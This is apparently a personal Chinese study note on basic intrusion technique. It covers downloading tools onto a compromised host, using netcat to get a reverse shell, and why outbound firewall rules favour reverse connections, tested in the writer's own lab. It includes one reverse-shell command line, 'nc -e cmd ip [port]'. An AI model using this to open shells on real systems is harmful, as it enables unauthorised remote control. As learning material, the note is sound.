ps:2022.3.3 尝试重新更学习笔记,算是简单总结下所学的,也为之后查阅提供便利。
先谈文件下载
首先,文件下载主要通过棱角来得到linux或者windows不同系统的下载命令
其次NC瑞士军刀
若进入对方后台,可以通过前面所谈到的“文件下载”命令,在提前准备好的文件服务器上下载文件,如nc
通过对方nc反弹shell到自己的cmd上(前提自己这边是公网,如果是内网得做端口映射),相对于自己而言,也称之为反向连接。(正向连接是自己主动发出)
那为什么需要反向连接?
因为防火墙的机制——“出去容易,进来很难”
也就是对出去的流量限制宽松,而进来的很严格。所以这也是为什么要反向连接。
而对于正向连接的话在关掉对方的防火墙前提下,也容易实现。
而且自己内网是可以直接连通出去外网的,就不像反向连接有限制。
自己实际用服务器来尝试了一下,最后成功了。(实验环境:自己的电脑(内网)以及一台白嫖的华为服务器(外网))
有个需要注意的地方:关掉服务器防火墙之后,也需要修改服务器上的安全组(即开放端口),否则也无法成功。
自己发出请求:nc -e cmd ip [port]
这里是在对方端口监听到的,已经获取自己这边的cmd了,成功。